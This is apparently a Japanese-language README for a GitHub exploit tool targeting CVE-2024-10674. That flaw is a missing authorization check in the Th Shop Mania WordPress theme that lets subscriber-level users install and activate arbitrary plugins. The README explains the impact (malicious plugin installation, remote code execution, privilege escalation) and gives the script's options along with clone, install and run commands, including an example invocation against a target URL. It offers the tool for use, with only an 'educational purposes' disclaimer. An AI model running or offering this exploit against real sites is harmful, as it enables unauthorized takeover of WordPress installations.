
Th Shop Mania <= 1.4.9 - 認証済み (Subscriber+) 任意のプラグインのインストール/有効化
このリポジトリには、Th Shop Mania WordPressテーマにおけるCVE-2024-10674として識別された脆弱性のエクスプロイトが含まれています。この脆弱性により、少なくとも購読者レベルのアクセス権を持つ認証済みユーザーが、適切な認可なしに任意のプラグインをインストールおよび有効化できるようになります。このエクスプロイトは悪意のあるプラグインをインストールするために利用される可能性があり、結果としてリモートコード実行や権限昇格につながる可能性があります。
タイトル: Th Shop Mania <= 1.4.9 - 認証済み(購読者以上)任意プラグインインストール/有効化
説明: WordPress用Th Shop Maniaテーマは、バージョン1.4.9までの全バージョンにおいて、th_shop_mania_install_and_activate_callback()関数に対するcapabilityチェックが欠如しているため、不正な任意プラグインインストールに対して脆弱です。これにより、購読者レベル以上のアクセス権を持つ認証済み攻撃者が任意のプラグインをインストールできるようになり、そのプラグインを悪用して他の脆弱性を突いたり、リモートコード実行や権限昇格を達成することが可能になります。
usage: CVE-2024-10674.py [-h] -u URL -U USERNAME -P PASSWORD [-p PLUGIN]
Exploit for CVE-2024-10674 (# By Nxploit | Khaled alenazi,)
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)
-U USERNAME, --username USERNAME
WordPress username
-P PASSWORD, --password PASSWORD
WordPress password
-p PLUGIN, --plugin PLUGIN
Plugin to install (default: All In One Woo Cart)
リポジトリをクローン:
git clone https://github.com/Nxploited/CVE-2024-10674.git
cd CVE-2024-10674
依存関係をインストール:
requestsライブラリがインストールされていることを確認してください。ない場合は、pipを使用してインストールします:
pip install requests
エクスプロイトを実行:
python exploit_script.py --url <target-url> --username <wp-username> --password <wp-password> --plugin <plugin-name>
例:
python exploit_script.py --url http://192.168.100.74:888/wordpress --username admin --password admin --plugin hello-dolly
--url: 対象のWordPressサイトのURL。--username: 少なくとも購読者レベルのアクセス権を持つWordPressユーザー名。--password: WordPressユーザー名のパスワード。--plugin: インストールおよび有効化するプラグイン(デフォルト: th-all-in-one-woo-cart)。エクスプロイトスクリプトは以下の出力を提供します:
このエクスプロイトは教育目的のみで提供されています。自己責任で使用してください。著者は、このエクスプロイトの使用によって生じたいかなる損害についても責任を負いません。
お問い合わせは、GitHubまでご連絡ください。